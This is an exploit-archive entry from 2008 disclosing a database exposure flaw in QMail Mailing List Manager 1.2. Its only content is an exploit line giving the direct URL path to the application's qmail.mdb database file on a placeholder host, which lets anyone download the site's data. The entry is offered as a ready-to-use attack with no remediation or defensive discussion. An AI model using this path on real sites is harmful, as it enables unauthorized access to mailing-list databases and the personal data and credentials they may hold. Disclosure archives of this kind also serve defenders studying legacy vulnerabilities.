id: 4381
date: 12/07/2008
title: QMail Mailing List Manager 1.2 Database Disclosure Vulnerability
author: Ghost Hacker
cves: 

================================================================
QMail Mailing List Manager 1.2 Database Disclosure Vulnerability
================================================================


####################################################################################################
# QMail Mailing List Manager 1.2 (qmail.mdb) Database Disclosure Vulnerability                     #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Bug : Database Disclosure                                                                     #
#[~] Name Script : QMail Mailing List Manager 1.2                                                  #
#[~] Download : http://www.dotnetindex.com/downloads/easy_download_getinfo.asp?id=6                #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/database/qmail.mdb                                                        #
####################################################################################################



#  0day.today [2023-03-24]  #